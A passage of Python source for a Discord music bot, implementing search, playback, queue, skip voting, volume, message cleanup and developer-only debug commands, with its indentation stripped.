leftover_args = shlex.split(" ".join(leftover_args))
except ValueError:
raise exceptions.CommandError(
self.str.get(
"cmd-search-noquote", "Please quote your search query properly."
),
expire_in=30,
)
service = "youtube"
items_requested = self.config.defaultsearchresults
max_items = permissions.max_search_items
services = {
"youtube": "ytsearch",
"soundcloud": "scsearch",
"yahoo": "yvsearch",
"yt": "ytsearch",
"sc": "scsearch",
"yh": "yvsearch",
}
if leftover_args[0] in services:
service = leftover_args.pop(0)
argcheck()
if leftover_args[0].isdigit():
items_requested = int(leftover_args.pop(0))
argcheck()
if items_requested > max_items:
raise exceptions.CommandError(
self.str.get(
"cmd-search-searchlimit",
"You cannot search for more than %s videos",
)
% max_items
)
# Look jake, if you see this and go "what the fuck are you doing"
# and have a better idea on how to do this, i'd be delighted to know.
# I don't want to just do ' '.join(leftover_args).strip("\"'")
# Because that eats both quotes if they're there
# where I only want to eat the outermost ones
if leftover_args[0][0] in "'\"":
lchar = leftover_args[0][0]
leftover_args[0] = leftover_args[0].lstrip(lchar)
leftover_args[-1] = leftover_args[-1].rstrip(lchar)
search_query = "%s%s:%s" % (
services[service],
items_requested,
" ".join(leftover_args),
)
search_msg = await self.safe_send_message(
channel, self.str.get("cmd-search-searching", "Searching for videos...")
)
await self.send_typing(channel)
try:
info = await self.downloader.extract_info(
player.playlist.loop, search_query, download=False, process=True
)
except Exception as e:
await self.safe_edit_message(search_msg, str(e), send_if_fail=True)
return
else:
await self.safe_delete_message(search_msg)
if not info:
return Response(
self.str.get("cmd-search-none", "No videos found."), delete_after=30
)
# Decide if the list approach or the reaction approach should be used
if self.config.searchlist:
result_message_array = []
if self.config.embeds:
content = self._gen_embed()
content.title = self.str.get(
"cmd-search-title", "{0} search results:"
).format(service.capitalize())
content.description = "To select a song, type the corresponding number"
else:
result_header = self.str.get(
"cmd-search-title", "{0} search results:"
).format(service.capitalize())
result_header += "\n\n"
for e in info["entries"]:
# This formats the results and adds it to an array
# format_song_duration removes the hour section
# if the song is shorter than an hour
result_message_array.append(
self.str.get(
"cmd-search-list-entry", "**{0}**. **{1}** | {2}"
).format(
info["entries"].index(e) + 1,
e["title"],
format_song_duration(
ftimedelta(timedelta(seconds=e["duration"]))
),
)
)
# This combines the formatted result strings into one list.
result_string = "\n".join(
"{0}".format(result) for result in result_message_array
)
result_string += "\n**0.** Cancel"
if self.config.embeds:
# Add the result entries to the embedded message and send it to the channel
content.add_field(
name=self.str.get("cmd-search-field-name", "Pick a song"),
value=result_string,
inline=False,
)
result_message = await self.safe_send_message(channel, content)
else:
# Construct the complete message and send it to the channel.
result_string = result_header + result_string
result_string += "\n\nSelect a song by typing the corresponding number, or type 0 to cancel the search"
result_message = await self.safe_send_message(
channel,
self.str.get("cmd-search-result-list-noembed", "{0}").format(
result_string
),
)
# Check to verify that the received message is valid.
def check(reply):
return (
reply.channel.id == channel.id
and reply.author == message.author
and reply.content.isdigit()
and 0 <= int(reply.content) <= len(info["entries"])
)
# Wait for a response from the author.
try:
choice = await self.wait_for("message", timeout=30.0, check=check)
except asyncio.TimeoutError:
await self.safe_delete_message(result_message)
return
if choice.content == "0":
# Choice 0 will cancel the search
if self.config.delete_invoking:
await self.safe_delete_message(choice)
await self.safe_delete_message(result_message)
else:
# Here we have a valid choice lets queue it.
if self.config.delete_invoking:
await self.safe_delete_message(choice)
await self.safe_delete_message(result_message)
await self.cmd_play(
message,
player,
channel,
author,
permissions,
[],
info["entries"][int(choice.content) - 1]["webpage_url"],
)
if self.config.embeds:
return Response(
self.str.get(
"cmd-search-accept-list-embed", "[{0}]({1}) added to queue"
).format(
info["entries"][int(choice.content) - 1]["title"],
info["entries"][int(choice.content) - 1]["webpage_url"],
),
delete_after=30,
)
else:
return Response(
self.str.get(
"cmd-search-accept-list-noembed", "{0} added to queue"
).format(info["entries"][int(choice.content) - 1]["title"]),
delete_after=30,
)
else:
# Original code
for e in info["entries"]:
result_message = await self.safe_send_message(
channel,
self.str.get("cmd-search-result", "Result {0}/{1}: {2}").format(
info["entries"].index(e) + 1,
len(info["entries"]),
e["webpage_url"],
),
)
def check(reaction, user):
return (
user == message.author
and reaction.message.id == result_message.id
) # why can't these objs be compared directly?
reactions = ["\u2705", "\U0001F6AB", "\U0001F3C1"]
for r in reactions:
await result_message.add_reaction(r)
try:
reaction, user = await self.wait_for(
"reaction_add", timeout=30.0, check=check
)
except asyncio.TimeoutError:
await self.safe_delete_message(result_message)
return
if str(reaction.emoji) == "\u2705": # check
await self.safe_delete_message(result_message)
await self.cmd_play(
message,
player,
channel,
author,
permissions,
[],
e["webpage_url"],
)
return Response(
self.str.get("cmd-search-accept", "Alright, coming right up!"),
delete_after=30,
)
elif str(reaction.emoji) == "\U0001F6AB": # cross
await self.safe_delete_message(result_message)
else:
await self.safe_delete_message(result_message)
return Response(
self.str.get("cmd-search-decline", "Oh well :("), delete_after=30
)
async def cmd_np(self, player, channel, guild, message):
"""
Usage:
{command_prefix}np
Displays the current song in chat.
"""
if player.current_entry:
if self.server_specific_data[guild]["last_np_msg"]:
await self.safe_delete_message(
self.server_specific_data[guild]["last_np_msg"]
)
self.server_specific_data[guild]["last_np_msg"] = None
# TODO: Fix timedelta garbage with util function
song_progress = ftimedelta(timedelta(seconds=player.progress))
song_total = (
ftimedelta(timedelta(seconds=player.current_entry.duration))
if player.current_entry.duration is not None
else "(no duration data)"
)
streaming = isinstance(player.current_entry, StreamPlaylistEntry)
prog_str = (
"`[{progress}]`" if streaming else "`[{progress}/{total}]`"
).format(progress=song_progress, total=song_total)
prog_bar_str = ""
# percentage shows how much of the current song has already been played
percentage = 0.0
if player.current_entry.duration and player.current_entry.duration > 0:
percentage = player.progress / player.current_entry.duration
# create the actual bar
progress_bar_length = 30
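# each bar cell covers 1/30 of the track: '■' marks the portion already played, '□' the remainder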
for i in range(progress_bar_length):
if percentage < 1 / progress_bar_length * i:
prog_bar_str += "□"
else:
prog_bar_str += "■"
action_text = (
self.str.get("cmd-np-action-streaming", "Streaming")
if streaming
else self.str.get("cmd-np-action-playing", "Playing")
)
if player.current_entry.meta.get(
"channel", False
) and player.current_entry.meta.get("author", False):
np_text = self.str.get(
"cmd-np-reply-author",
"Now {action}: **{title}** added by **{author}**\nProgress: {progress_bar} {progress}\n\N{WHITE RIGHT POINTING BACKHAND INDEX} <{url}>",
).format(
action=action_text,
title=player.current_entry.title,
author=player.current_entry.meta["author"].name,
progress_bar=prog_bar_str,
progress=prog_str,
url=player.current_entry.url,
)
else:
np_text = self.str.get(
"cmd-np-reply-noauthor",
"Now {action}: **{title}**\nProgress: {progress_bar} {progress}\n\N{WHITE RIGHT POINTING BACKHAND INDEX} <{url}>",
).format(
action=action_text,
title=player.current_entry.title,
progress_bar=prog_bar_str,
progress=prog_str,
url=player.current_entry.url,
)
self.server_specific_data[guild][
"last_np_msg"
] = await self.safe_send_message(channel, np_text)
await self._manual_delete_check(message)
else:
return Response(
self.str.get(
"cmd-np-none",
"There are no songs queued! Queue something with {0}play.",
).format(self.config.command_prefix),
delete_after=30,
)
async def cmd_summon(self, channel, guild, author, voice_channel):
"""
Usage:
{command_prefix}summon
Call the bot to the summoner's voice channel.
"""
# @TheerapakG: Maybe summon should have async lock?
if not author.voice:
raise exceptions.CommandError(
self.str.get(
"cmd-summon-novc",
"You are not connected to voice. Try joining a voice channel!",
)
)
voice_client = self.voice_client_in(guild)
if voice_client and guild == author.voice.channel.guild:
await voice_client.move_to(author.voice.channel)
else:
# move to _verify_vc_perms?
chperms = author.voice.channel.permissions_for(guild.me)
if not chperms.connect:
log.warning(
"Cannot join channel '{0}', no permission.".format(
author.voice.channel.name
)
)
raise exceptions.CommandError(
self.str.get(
"cmd-summon-noperms-connect",
"Cannot join channel `{0}`, no permission to connect.",
).format(author.voice.channel.name),
expire_in=25,
)
elif not chperms.speak:
log.warning(
"Cannot join channel '{0}', no permission to speak.".format(
author.voice.channel.name
)
)
raise exceptions.CommandError(
self.str.get(
"cmd-summon-noperms-speak",
"Cannot join channel `{0}`, no permission to speak.",
).format(author.voice.channel.name),
expire_in=25,
)
player = await self.get_player(
author.voice.channel,
create=True,
deserialize=self.config.persistent_queue,
)
if player.is_stopped:
player.play()
if self.config.auto_playlist:
await self.on_player_finished_playing(player)
log.info("Joining {0.guild.name}/{0.name}".format(author.voice.channel))
return Response(
self.str.get("cmd-summon-reply", "Connected to `{0.name}`").format(
author.voice.channel
)
)
async def cmd_pause(self, player):
"""
Usage:
{command_prefix}pause
Pauses playback of the current song.
"""
if player.is_playing:
player.pause()
return Response(
self.str.get("cmd-pause-reply", "Paused music in `{0.name}`").format(
player.voice_client.channel
)
)
else:
raise exceptions.CommandError(
self.str.get("cmd-pause-none", "Player is not playing."), expire_in=30
)
async def cmd_resume(self, player):
"""
Usage:
{command_prefix}resume
Resumes playback of a paused song.
"""
if player.is_paused:
player.resume()
return Response(
self.str.get("cmd-resume-reply", "Resumed music in `{0.name}`").format(
player.voice_client.channel
),
delete_after=15,
)
elif player.is_stopped and player.playlist:
player.play()
else:
raise exceptions.CommandError(
self.str.get("cmd-resume-none", "Player is not paused."), expire_in=30
)
async def cmd_shuffle(self, channel, player):
"""
Usage:
{command_prefix}shuffle
Shuffles the server's queue.
"""
player.playlist.shuffle()
cards = [
"\N{BLACK SPADE SUIT}",
"\N{BLACK CLUB SUIT}",
"\N{BLACK HEART SUIT}",
"\N{BLACK DIAMOND SUIT}",
]
random.shuffle(cards)
hand = await self.safe_send_message(channel, " ".join(cards))
await asyncio.sleep(0.6)
for x in range(4):
random.shuffle(cards)
await self.safe_edit_message(hand, " ".join(cards))
await asyncio.sleep(0.6)
await self.safe_delete_message(hand, quiet=True)
return Response(
self.str.get("cmd-shuffle-reply", "Shuffled `{0}`'s queue.").format(
player.voice_client.channel.guild
),
delete_after=15,
)
async def cmd_clear(self, player, author):
"""
Usage:
{command_prefix}clear
Clears the playlist.
"""
player.playlist.clear()
return Response(
self.str.get("cmd-clear-reply", "Cleared `{0}`'s queue").format(
player.voice_client.channel.guild
),
delete_after=20,
)
async def cmd_remove(
self, user_mentions, message, author, permissions, channel, player, index=None
):
"""
Usage:
{command_prefix}remove [# in queue]
Removes queued songs. If a number is specified, removes that song in the queue, otherwise removes the most recently queued song.
"""
if not player.playlist.entries:
raise exceptions.CommandError(
self.str.get("cmd-remove-none", "There's nothing to remove!"),
expire_in=20,
)
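# Removal by mention: strip every queued entry added by each mentioned user; allowed for the invoker's own entries or anyone with the remove permission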
if user_mentions:
for user in user_mentions:
if permissions.remove or author == user:
try:
entry_indexes = [
e
for e in player.playlist.entries
if e.meta.get("author", None) == user
]
for entry in entry_indexes:
player.playlist.entries.remove(entry)
entry_text = "%s " % len(entry_indexes) + "item"
if len(entry_indexes) > 1:
entry_text += "s"
return Response(
self.str.get(
"cmd-remove-reply", "Removed `{0}` added by `{1}`"
)
.format(entry_text, user.name)
.strip()
)
except ValueError:
raise exceptions.CommandError(
self.str.get(
"cmd-remove-missing",
"Nothing found in the queue from user `%s`",
)
% user.name,
expire_in=20,
)
raise exceptions.PermissionsError(
self.str.get(
"cmd-remove-noperms",
"You do not have permission to remove that entry from the queue; make sure you're the one who queued it or have instant skip permissions",
),
expire_in=20,
)
if not index:
index = len(player.playlist.entries)
try:
index = int(index)
except (TypeError, ValueError):
raise exceptions.CommandError(
self.str.get(
"cmd-remove-invalid",
"Invalid number. Use {}queue to find queue positions.",
).format(self.config.command_prefix),
expire_in=20,
)
if index > len(player.playlist.entries):
raise exceptions.CommandError(
self.str.get(
"cmd-remove-invalid",
"Invalid number. Use {}queue to find queue positions.",
).format(self.config.command_prefix),
expire_in=20,
)
if permissions.remove or author == player.playlist.get_entry_at_index(
index - 1
).meta.get("author", None):
entry = player.playlist.delete_entry_at_index((index - 1))
await self._manual_delete_check(message)
if entry.meta.get("channel", False) and entry.meta.get("author", False):
return Response(
self.str.get(
"cmd-remove-reply-author", "Removed entry `{0}` added by `{1}`"
)
.format(entry.title, entry.meta["author"].name)
.strip()
)
else:
return Response(
self.str.get("cmd-remove-reply-noauthor", "Removed entry `{0}`")
.format(entry.title)
.strip()
)
else:
raise exceptions.PermissionsError(
self.str.get(
"cmd-remove-noperms",
"You do not have permission to remove that entry from the queue; make sure you're the one who queued it or have instant skip permissions",
),
expire_in=20,
)
async def cmd_skip(
self, player, channel, author, message, permissions, voice_channel, param=""
):
"""
Usage:
{command_prefix}skip [force/f]
Skips the current song when enough votes are cast.
Owners and those with the instaskip permission can add 'force' or 'f' after the command to force skip.
"""
if player.is_stopped:
raise exceptions.CommandError(
self.str.get("cmd-skip-none", "Can't skip! The player is not playing!"),
expire_in=20,
)
if not player.current_entry:
if player.playlist.peek():
if player.playlist.peek()._is_downloading:
return Response(
self.str.get(
"cmd-skip-dl",
"The next song (`%s`) is downloading, please wait.",
)
% player.playlist.peek().title
)
elif player.playlist.peek().is_downloaded:
print("The next song will be played shortly. Please wait.")
else:
print(
"Something odd is happening. "
"You might want to restart the bot if it doesn't start working."
)
else:
print(
"Something strange is happening. "
"You might want to restart the bot if it doesn't start working."
)
current_entry = player.current_entry
permission_force_skip = permissions.instaskip or (
self.config.allow_author_skip
and author == player.current_entry.meta.get("author", None)
)
force_skip = param.lower() in ["force", "f"]
if permission_force_skip and (force_skip or self.config.legacy_skip):
player.skip() # TODO: check autopause stuff here
await self._manual_delete_check(message)
return Response(
self.str.get("cmd-skip-force", "Force skipped `{}`.").format(
current_entry.title
),
reply=True,
delete_after=30,
)
if not permission_force_skip and force_skip:
raise exceptions.PermissionsError(
self.str.get(
"cmd-skip-force-noperms",
"You do not have permission to force skip.",
),
expire_in=30,
)
# TODO: ignore person if they're deaf or take them out of the list or something?
# Currently is recounted if they vote, deafen, then vote
num_voice = sum(
1
for m in voice_channel.members
if not (m.voice.deaf or m.voice.self_deaf or m == self.user)
)
if num_voice == 0:
num_voice = 1  # in case all users are deafened, to avoid division by zero
num_skips = player.skip_state.add_skipper(author.id, message)
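# votes needed is the smaller of the configured absolute skip count and ceil(skip ratio * active listeners)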
skips_remaining = (
min(
self.config.skips_required,
math.ceil(
self.config.skip_ratio_required / (1 / num_voice)
), # Number of skips from config ratio
)
- num_skips
)
if skips_remaining <= 0:
player.skip() # check autopause stuff here
# @TheerapakG: Check for pausing state in the player.py make more sense
return Response(
self.str.get(
"cmd-skip-reply-skipped-1",
"Your skip for `{0}` was acknowledged.\nThe vote to skip has been passed.{1}",
).format(
current_entry.title,
self.str.get("cmd-skip-reply-skipped-2", " Next song coming up!")
if player.playlist.peek()
else "",
),
reply=True,
delete_after=20,
)
else:
# TODO: When a song gets skipped, delete the old x needed to skip messages
return Response(
self.str.get(
"cmd-skip-reply-voted-1",
"Your skip for `{0}` was acknowledged.\n**{1}** more {2} required to vote to skip this song.",
).format(
current_entry.title,
skips_remaining,
self.str.get("cmd-skip-reply-voted-2", "person is")
if skips_remaining == 1
else self.str.get("cmd-skip-reply-voted-3", "people are"),
),
reply=True,
delete_after=20,
)
async def cmd_volume(self, message, player, new_volume=None):
"""
Usage:
{command_prefix}volume (+/-)[volume]
Sets the playback volume. Accepted values are from 1 to 100.
Putting + or - before the volume will make the volume change relative to the current volume.
"""
if not new_volume:
return Response(
self.str.get("cmd-volume-current", "Current volume: `%s%%`")
% int(player.volume * 100),
reply=True,
delete_after=20,
)
relative = False
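# a leading '+' or '-' marks the value as a change relative to the current volume; int() below keeps the sign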
if new_volume[0] in "+-":
relative = True
try:
new_volume = int(new_volume)
except ValueError:
raise exceptions.CommandError(
self.str.get(
"cmd-volume-invalid", "`{0}` is not a valid number"
).format(new_volume),
expire_in=20,
)
vol_change = None
if relative:
vol_change = new_volume
new_volume += player.volume * 100
old_volume = int(player.volume * 100)
if 0 < new_volume <= 100:
player.volume = new_volume / 100.0
return Response(
self.str.get("cmd-volume-reply", "Updated volume from **%d** to **%d**")
% (old_volume, new_volume),
reply=True,
delete_after=20,
)
else:
if relative:
raise exceptions.CommandError(
self.str.get(
"cmd-volume-unreasonable-relative",
"Unreasonable volume change provided: {}{:+} -> {}%. Provide a change between {} and {:+}.",
).format(
old_volume,
vol_change,
old_volume + vol_change,
1 - old_volume,
100 - old_volume,
),
expire_in=20,
)
else:
raise exceptions.CommandError(
self.str.get(
"cmd-volume-unreasonable-absolute",
"Unreasonable volume provided: {}%. Provide a value between 1 and 100.",
).format(new_volume),
expire_in=20,
)
@owner_only
async def cmd_option(self, player, option, value):
"""
Usage:
{command_prefix}option [option] [on/y/enabled/off/n/disabled]
Changes a config option without restarting the bot. Changes aren't permanent and
only last until the bot is restarted. To make permanent changes, edit the
config file.
Valid options:
autoplaylist, save_videos, now_playing_mentions, auto_playlist_random, auto_pause,
delete_messages, delete_invoking, write_current_song
For information about these options, see the option's comment in the config file.
"""
option = option.lower()
value = value.lower()
bool_y = ["on", "y", "enabled"]
bool_n = ["off", "n", "disabled"]
generic = [
"save_videos",
"now_playing_mentions",
"auto_playlist_random",
"auto_pause",
"delete_messages",
"delete_invoking",
"write_current_song",
] # these need to match attribute names in the Config class
if option in ["autoplaylist", "auto_playlist"]:
if value in bool_y:
if self.config.auto_playlist:
raise exceptions.CommandError(
self.str.get(
"cmd-option-autoplaylist-enabled",
"The autoplaylist is already enabled!",
)
)
else:
if not self.autoplaylist:
raise exceptions.CommandError(
self.str.get(
"cmd-option-autoplaylist-none",
"There are no entries in the autoplaylist file.",
)
)
self.config.auto_playlist = True
await self.on_player_finished_playing(player)
elif value in bool_n:
if not self.config.auto_playlist:
raise exceptions.CommandError(
self.str.get(
"cmd-option-autoplaylist-disabled",
"The autoplaylist is already disabled!",
)
)
else:
self.config.auto_playlist = False
else:
raise exceptions.CommandError(
self.str.get(
"cmd-option-invalid-value", "The value provided was not valid."
)
)
return Response(
"The autoplaylist is now "
+ ["disabled", "enabled"][self.config.auto_playlist]
+ "."
)
else:
is_generic = [
o for o in generic if o == option
] # check if it is a generic bool option
if is_generic and (value in bool_y or value in bool_n):
name = is_generic[0]
log.debug("Setting attribute {0}".format(name))
setattr(
self.config, name, True if value in bool_y else False
) # this is scary but should work
attr = getattr(self.config, name)
res = (
"The option {0} is now ".format(option)
+ ["disabled", "enabled"][attr]
+ "."
)
log.warning("Option overriden for this session: {0}".format(res))
return Response(res)
else:
raise exceptions.CommandError(
self.str.get(
"cmd-option-invalid-param",
"The parameters provided were invalid.",
)
)
async def cmd_queue(self, channel, player):
"""
Usage:
{command_prefix}queue
Prints the current song queue.
"""
lines = []
unlisted = 0
andmoretext = "* ... and %s more*" % ("x" * len(player.playlist.entries))
if player.is_playing:
# TODO: Fix timedelta garbage with util function
song_progress = ftimedelta(timedelta(seconds=player.progress))
song_total = (
ftimedelta(timedelta(seconds=player.current_entry.duration))
if player.current_entry.duration is not None
else "(no duration data)"
)
prog_str = "`[%s/%s]`" % (song_progress, song_total)
if player.current_entry.meta.get(
"channel", False
) and player.current_entry.meta.get("author", False):
lines.append(
self.str.get(
"cmd-queue-playing-author",
"Currently playing: `{0}` added by `{1}` {2}\n",
).format(
player.current_entry.title,
player.current_entry.meta["author"].name,
prog_str,
)
)
else:
lines.append(
self.str.get(
"cmd-queue-playing-noauthor", "Currently playing: `{0}` {1}\n"
).format(player.current_entry.title, prog_str)
)
for i, item in enumerate(player.playlist, 1):
if item.meta.get("channel", False) and item.meta.get("author", False):
nextline = (
self.str.get("cmd-queue-entry-author", "{0} -- `{1}` by `{2}`")
.format(i, item.title, item.meta["author"].name)
.strip()
)
else:
nextline = (
self.str.get("cmd-queue-entry-noauthor", "{0} -- `{1}`")
.format(i, item.title)
.strip()
)
currentlinesum = sum(len(x) + 1 for x in lines) # +1 is for newline char
if (
currentlinesum + len(nextline) + len(andmoretext)
> DISCORD_MSG_CHAR_LIMIT
) or (i > self.config.queue_length):
if currentlinesum + len(andmoretext):
unlisted += 1
continue
lines.append(nextline)
if unlisted:
lines.append(self.str.get("cmd-queue-more", "\n... and %s more") % unlisted)
if not lines:
lines.append(
self.str.get(
"cmd-queue-none",
"There are no songs queued! Queue something with {}play.",
).format(self.config.command_prefix)
)
message = "\n".join(lines)
return Response(message, delete_after=30)
async def cmd_clean(self, message, channel, guild, author, search_range=50):
"""
Usage:
{command_prefix}clean [range]
Removes up to [range] messages the bot has posted in chat. Default: 50, Max: 1000
"""
try:
float(search_range) # lazy check
search_range = min(int(search_range), 1000)
except:
return Response(
self.str.get(
"cmd-clean-invalid",
"Invalid parameter. Please provide a number of messages to search.",
),
reply=True,
delete_after=8,
)
await self.safe_delete_message(message, quiet=True)
def is_possible_command_invoke(entry):
valid_call = any(
entry.content.startswith(prefix)
for prefix in [self.config.command_prefix]
) # can be expanded
return valid_call and not entry.content[1:2].isspace()
delete_invokes = True
delete_all = (
channel.permissions_for(author).manage_messages
or self.config.owner_id == author.id
)
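# purge the bot's own messages; command invocations are only removed for their author, or for everyone when the caller can manage messages or owns the bot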
def check(message):
if is_possible_command_invoke(message) and delete_invokes:
return delete_all or message.author == author
return message.author == self.user
if self.user.bot:
if channel.permissions_for(guild.me).manage_messages:
deleted = await channel.purge(
check=check, limit=search_range, before=message
)
return Response(
self.str.get(
"cmd-clean-reply", "Cleaned up {0} message{1}."
).format(len(deleted), "s" * bool(deleted)),
delete_after=15,
)
async def cmd_pldump(self, channel, author, song_url):
"""
Usage:
{command_prefix}pldump url
Dumps the individual urls of a playlist
"""
try:
info = await self.downloader.extract_info(
self.loop, song_url.strip("<>"), download=False, process=False
)
except Exception as e:
raise exceptions.CommandError(
"Could not extract info from input url\n%s\n" % e, expire_in=25
)
if not info:
raise exceptions.CommandError(
"Could not extract info from input url, no data.", expire_in=25
)
if not info.get("entries", None):
# TODO: Improve playlist checking
# set(url, webpageurl).difference(set(url))
if info.get("url", None) != info.get("webpage_url", info.get("url", None)):
raise exceptions.CommandError(
"This does not seem to be a playlist.", expire_in=25
)
else:
return await self.cmd_pldump(channel, author, info.get("webpage_url", song_url))
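# map the base extractor name to a function that rebuilds a direct URL for each playlist entry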
linegens = defaultdict(
lambda: None,
**{
"youtube": lambda d: "https://www.youtube.com/watch?v=%s" % d["id"],
"soundcloud": lambda d: d["url"],
"bandcamp": lambda d: d["url"],
}
)
exfunc = linegens[info["extractor"].split(":")[0]]
if not exfunc:
raise exceptions.CommandError(
"Could not extract info from input url, unsupported playlist type.",
expire_in=25,
)
with BytesIO() as fcontent:
for item in info["entries"]:
fcontent.write(exfunc(item).encode("utf8") + b"\n")
fcontent.seek(0)
await author.send(
"Here's the playlist dump for <%s>" % song_url,
file=discord.File(fcontent, filename="playlist.txt"),
)
return Response("Sent a message with a playlist file.", delete_after=20)
async def cmd_listids(self, guild, author, leftover_args, cat="all"):
"""
Usage:
{command_prefix}listids [categories]
Lists the ids for various things. Categories are:
all, users, roles, channels
"""
cats = ["channels", "roles", "users"]
if cat not in cats and cat != "all":
return Response(
"Valid categories: " + " ".join(["`%s`" % c for c in cats]),
reply=True,
delete_after=25,
)
if cat == "all":
requested_cats = cats
else:
requested_cats = [cat] + [c.strip(",") for c in leftover_args]
data = ["Your ID: %s" % author.id]
for cur_cat in requested_cats:
rawudata = None
if cur_cat == "users":
data.append("\nUser IDs:")
rawudata = [
"%s #%s: %s" % (m.name, m.discriminator, m.id)
for m in guild.members
]
elif cur_cat == "roles":
data.append("\nRole IDs:")
rawudata = ["%s: %s" % (r.name, r.id) for r in guild.roles]
elif cur_cat == "channels":
data.append("\nText Channel IDs:")
tchans = [
c for c in guild.channels if isinstance(c, discord.TextChannel)
]
rawudata = ["%s: %s" % (c.name, c.id) for c in tchans]
rawudata.append("\nVoice Channel IDs:")
vchans = [
c for c in guild.channels if isinstance(c, discord.VoiceChannel)
]
rawudata.extend("%s: %s" % (c.name, c.id) for c in vchans)
if rawudata:
data.extend(rawudata)
with BytesIO() as sdata:
sdata.writelines(d.encode("utf8") + b"\n" for d in data)
sdata.seek(0)
# TODO: Fix naming (Discord20API-ids.txt)
await author.send(
file=discord.File(
sdata,
filename="%s-ids-%s.txt" % (guild.name.replace(" ", "_"), cat),
)
)
return Response("Sent a message with a list of IDs.", delete_after=20)
async def cmd_perms(
self, author, user_mentions, channel, guild, message, permissions, target=None
):
"""
Usage:
{command_prefix}perms [@user]
Sends the user a list of their permissions, or the permissions of the user specified.
"""
if user_mentions:
user = user_mentions[0]
if not user_mentions and not target:
user = author
if not user_mentions and target:
user = guild.get_member_named(target)
if user is None:
try:
user = await self.fetch_user(target)
except discord.NotFound:
return Response(
"Invalid user ID or server nickname, please double check all typing and try again.",
reply=False,
delete_after=30,
)
permissions = self.permissions.for_user(user)
if user == author:
lines = ["Command permissions in %s\n" % guild.name, "```", "```"]
else:
lines = [
"Command permissions for {} in {}\n".format(user.name, guild.name),
"```",
"```",
]
for perm in permissions.__dict__:
if perm in ["user_list"] or permissions.__dict__[perm] == set():
continue
lines.insert(len(lines) - 1, "%s: %s" % (perm, permissions.__dict__[perm]))
await self.safe_send_message(author, "\n".join(lines))
return Response("\N{OPEN MAILBOX WITH RAISED FLAG}", delete_after=20)
@owner_only
async def cmd_setname(self, leftover_args, name):
"""
Usage:
{command_prefix}setname name
Changes the bot's username.
Note: This operation is limited by discord to twice per hour.
"""
name = " ".join([name, *leftover_args])
try:
await self.user.edit(username=name)
except discord.HTTPException:
raise exceptions.CommandError(
"Failed to change name. Did you change names too many times? "
"Remember name changes are limited to twice per hour."
)
except Exception as e:
raise exceptions.CommandError(e, expire_in=20)
return Response(
"Set the bot's username to **{0}**".format(name), delete_after=20
)
async def cmd_setnick(self, guild, channel, leftover_args, nick):
"""
Usage:
{command_prefix}setnick nick
Changes the bot's nickname.
"""
if not channel.permissions_for(guild.me).change_nickname:
raise exceptions.CommandError("Unable to change nickname: no permission.")
nick = " ".join([nick, *leftover_args])
try:
await guild.me.edit(nick=nick)
except Exception as e:
raise exceptions.CommandError(e, expire_in=20)
return Response("Set the bot's nickname to `{0}`".format(nick), delete_after=20)
@owner_only
async def cmd_setavatar(self, message, url=None):
"""
Usage:
{command_prefix}setavatar [url]
Changes the bot's avatar.
Attaching a file and leaving the url parameter blank also works.
"""
if message.attachments:
thing = message.attachments[0].url
elif url:
thing = url.strip("<>")
else:
raise exceptions.CommandError(
"You must provide a URL or attach a file.", expire_in=20
)
try:
timeout = aiohttp.ClientTimeout(total=10)
async with self.aiosession.get(thing, timeout=timeout) as res:
await self.user.edit(avatar=await res.read())
except Exception as e:
raise exceptions.CommandError(
"Unable to change avatar: {}".format(e), expire_in=20
)
return Response("Changed the bot's avatar.", delete_after=20)
async def cmd_disconnect(self, guild):
"""
Usage:
{command_prefix}disconnect
Forces the bot leave the current voice channel.
"""
await self.disconnect_voice_client(guild)
return Response("Disconnected from `{0.name}`".format(guild), delete_after=20)
async def cmd_restart(self, channel):
"""
Usage:
{command_prefix}restart
Restarts the bot.
Will not properly load new dependencies or file updates unless fully shutdown
and restarted.
"""
await self.safe_send_message(
channel,
"\N{WAVING HAND SIGN} Restarting. If you have updated your bot "
"or its dependencies, you need to restart the bot properly, rather than using this command.",
)
player = self.get_player_in(channel.guild)
if player and player.is_paused:
player.resume()
await self.disconnect_all_voice_clients()
raise exceptions.RestartSignal()
async def cmd_shutdown(self, channel):
"""
Usage:
{command_prefix}shutdown
Disconnects from voice channels and closes the bot process.
"""
await self.safe_send_message(channel, "\N{WAVING HAND SIGN}")
player = self.get_player_in(channel.guild)
if player and player.is_paused:
player.resume()
await self.disconnect_all_voice_clients()
raise exceptions.TerminateSignal()
async def cmd_leaveserver(self, val, leftover_args):
"""
Usage:
{command_prefix}leaveserver <name/ID>
Forces the bot to leave a server.
When providing names, names are case-sensitive.
"""
if leftover_args:
val = " ".join([val, *leftover_args])
t = self.get_guild(val)
if t is None:
t = discord.utils.get(self.guilds, name=val)
if t is None:
raise exceptions.CommandError(
"No guild was found with the ID or name as `{0}`".format(val)
)
await t.leave()
return Response(
"Left the guild: `{0.name}` (Owner: `{0.owner.name}`, ID: `{0.id}`)".format(
t
)
)
@dev_only
async def cmd_breakpoint(self, message):
log.critical("Activating debug breakpoint")
return
@dev_only
async def cmd_objgraph(self, channel, func="most_common_types()"):
import objgraph
await self.send_typing(channel)
if func == "growth":
f = StringIO()
objgraph.show_growth(limit=10, file=f)
f.seek(0)
data = f.read()
f.close()
elif func == "leaks":
f = StringIO()
objgraph.show_most_common_types(
objects=objgraph.get_leaking_objects(), file=f
)
f.seek(0)
data = f.read()
f.close()
elif func == "leakstats":
data = objgraph.typestats(objects=objgraph.get_leaking_objects())
else:
data = eval("objgraph." + func)
return Response(data, codeblock="py")
@dev_only
async def cmd_debug(self, message, _player, *, data):
codeblock = "```py\n{}\n```"
result = None
if data.startswith("```") and data.endswith("```"):
data = "\n".join(data.rstrip("`\n").split("\n")[1:])
code = data.strip("` \n")
scope = globals().copy()
scope.update({"self": self})
try:
result = eval(code, scope)
except:
try:
exec(code, scope)
except Exception as e:
traceback.print_exc(chain=False)
return Response("{}: {}".format(type(e).__name__, e))
if asyncio.iscoroutine(result):
result = await result
return Response(codeblock.format(result))
async def on_message(self, message):
await self.wait_until_ready()
message_content = message.content.strip()
if not message_content.startswith(self.config.command_prefix):
return
if message.author == self.user:
log.warning("Ignoring command from myself ({})".format(message.content))
return
if (
message.author.bot
and message.author.id not in self.config.bot_exception_ids
):
log.warning("Ignoring command from other bot ({})".format(message.content))
return
if (not isinstance(message.channel, discord.abc.GuildChannel)) and (
not isinstance(message.channel, discord.abc.PrivateChannel)
):
return
command, *args = message_content.split(
" "
) # Uh, doesn't this break prefixes with spaces in them (it doesn't, config parser already breaks them)
command = command[len(self.config.command_prefix) :].lower().strip()
# [] produces [''] which is not what we want (it breaks things)
if args:
args = " ".join(args).lstrip(" ").split(" ")
else:
args = []
